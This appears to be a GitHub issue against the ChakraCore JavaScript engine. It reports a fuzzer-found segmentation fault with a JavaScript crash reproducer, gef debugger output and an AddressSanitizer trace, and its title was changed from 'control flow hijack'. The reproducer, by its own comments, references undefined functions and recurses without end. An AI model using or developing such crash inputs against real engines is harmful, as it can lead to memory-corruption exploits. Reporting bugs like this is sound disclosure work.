
READ memory access #6645

Open
bird8693 opened this issue Mar 17, 2021 · 0 comments


bird8693 commented Mar 17, 2021

ubuntu

Ubuntu 16

PoC

// Fuzzer-generated entry point of the reproducer. It is not self-contained:
// `opt` and `Ttyn` are referenced but never defined anywhere in this script,
// main() declares no parameters although every caller below passes some, and
// the loop condition reads the global `ijjkkk` (the `var` declared in the
// top-level loop further down), not the local counter `i`.
function main() {
    let arr = new Array(100);
    arr[0] = 1.1;
    // Single argument: property key 1.1 with no setter function. Per the
    // ECMAScript Annex B definition this should throw a TypeError before the
    // loop is reached — TODO confirm how ch handles it.
    this.__defineSetter__(1.1);
    // `i` never bounds this loop; it runs while the global `ijjkkk` < 100000.
    for (let i = 0; ijjkkk < 100000; i++)
        opt(arr, 0, 0.014717213834064102);
    // `Ttyn` is undefined in this script; a ReferenceError is expected here.
    Ttyn[0] = 2.3023e-320;
    opt(3.141592653589793, 1.7976931348623157e+308, 3.141592653589793);
    // Unbounded recursion: main() re-enters itself with no base case.
    main();
}
var tWtH = new String();
// Property on the global object (`this` at top level in ch).
this.x = 4660;
// Base > 1 raised to a huge negative exponent: evaluates to 0; never read.
var hExw = 2147483649 ** -2147483649;
// Outer loop: every iteration adds properties to the global object and then
// spins a hot, side-effect-free inner loop. The ASAN stack in this report is
// raised from Js::InterpreterStackFrame::CallLoopBody with frame #0 in an
// unknown module, which is consistent with control being transferred to a
// jitted loop body; which loop that is cannot be determined from the page.
for (let i = 0; i < 749; i++) {
    // Key is a string: i+i+i concatenated with the literal text.
    this[i + i + i + ('new Number(1)' + ('new Number(1)' + i))] = 1;
    // Function.prototype.toString invoked with `this` = Function.prototype;
    // the argument is ignored and `aaMw` is reassigned further down.
    var aaMw = Function.prototype.toString('new Number(1)' + i);
    // `ijjkkk` is a global `var` (hoisted) that main() also reads.
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        // Constant expression (-8589934592); result unused.
        var KdrP = -4294967297 + -4294967295;
    }
    // `print` is not defined in this script; assumed to be the ch host builtin.
    print();
    var QtYj = escape('v0');
    let arr = new Array(100);
}
// Nothing past this line runs unless main() returns normally; see main() for
// the undefined names and the unbounded recursion in its body.
main('valueOf', () => {
});
this.__defineSetter__('valueOf', () => {
});
var aaMw = main(tWtH);
main(0.1, -4294967295);
var AziF = Proxy;
// Defines a setter for the property literally named '0' (quotes included).
this.__defineSetter__('\'0\'', () => {
});
// `opt` is never defined in this script.
opt('valueOf', () => {
});
// `b2` is never defined in this script, so the loop condition itself would
// throw; the update clause increments a property on the global object.
for (let i = 0; i < b2[72]; this['new Number(1)' + i]++) {
    this.__defineSetter__('valueOf', () => {
    });
    this['new Number(1)'] = 1;
}

gef output

   0x7ffff7e225bd                  mov    QWORD PTR [rsp+0x10], rdx
   0x7ffff7e225c2                  mov    QWORD PTR [rsp+0x8], rsi
   0x7ffff7e225c7                  mov    QWORD PTR [rsp], rdi
 → 0x7ffff7e225cb                  rex.W  call rax
   0x7ffff7e225ce                  mov    rax, QWORD PTR [rbx+0x8]
   0x7ffff7e225d2                  xor    ecx, ecx
   0x7ffff7e225d4                  mov    rdx, QWORD PTR [rbp-0x28]
   0x7ffff7e225d8                  cmp    rax, QWORD PTR [rdx]
   0x7ffff7e225db                  jne    0x7ffff7e22e5e
─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ch", stopped 0x7ffff7e225cb in ?? (), reason: SIGSEGV
[#1] Id 2, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#2] Id 3, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#3] Id 4, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7e225cb → rex.W call rax
[#1] 0x7fffffffd1d0 → add al, dh


asan output

ASAN:DEADLYSIGNAL
=================================================================
==52626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f8d5ea4330b bp 0x7ffd17f7e440 sp 0x7ffd17f7e330 T0)
==52626==The signal is caused by a READ memory access.
==52626==Hint: address points to the zero page.
    #0 0x7f8d5ea4330a  (<unknown module>)
    #1 0x561a58015642 in Js::InterpreterStackFrame::CallLoopBody(void* (*)(Js::RecyclableObject*, Js::CallInfo, ...)) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6313:13
    #2 0x561a58015642 in Js::InterpreterStackFrame::DoLoopBodyStart(unsigned int, Js::LayoutSize, bool, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6117
    #3 0x561a5801a309 in void Js::InterpreterStackFrame::ProfiledLoopBodyStart<false, true>(unsigned int, Js::LayoutSize, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5885:41
    #4 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned int) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5857:9
    #5 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned char const*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5729
    #6 0x561a57e36075 in Js::InterpreterStackFrame::ProcessProfiled() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterHandler.inl:51
    #7 0x561a57d9c679 in Js::InterpreterStackFrame::Process() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3427:20
    #8 0x561a57d9a890 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:2107:40
    #9 0x561a57d99c08 in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:1786:16
    #10 0x7f8d5eaa0fa1  (<unknown module>)
    #11 0x561a586daa0d in amd64_CallFunction /root/AFL/compile/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
    #12 0x561a582fec10 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:772:24
    #13 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:717:15
    #14 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:832
    #15 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83::operator()(Js::ScriptContext*, TTD::TTDJsRTActionResultAutoRecorder&) const /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3705:49
    #16 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}::operator()(Js::ScriptContext*) const /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:237
    #17 0x561a57796caa in _JsErrorCode ContextAPIWrapper_Core<false, _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}>(_JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:192
    #18 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:235
    #19 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3656
    #20 0x561a577a049a in CompileRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**, bool) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5019:12
    #21 0x561a577a049a in JsRun /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5041
    #22 0x561a57689419 in ChakraRTInterface::JsRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**) /root/AFL/compile/ChakraCore/bin/ch/ChakraRtInterface.h:483:179
    #23 0x561a57689419 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:491
    #24 0x561a5768bc44 in ExecuteTest(char const*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:963:13
    #25 0x561a5768c9a7 in ExecuteTestWithMemoryCheck(char*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1013:10
    #26 0x561a5768c9a7 in main /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1320
    #27 0x7f8d62fc682f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
    #28 0x561a57591298 in _start (/root/AFL/tt/chnew/ch2+0x2d7298)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (<unknown module>) 
==52626==ABORTING


@bird8693 bird8693 changed the title control flow hijack READ memory access Mar 17, 2021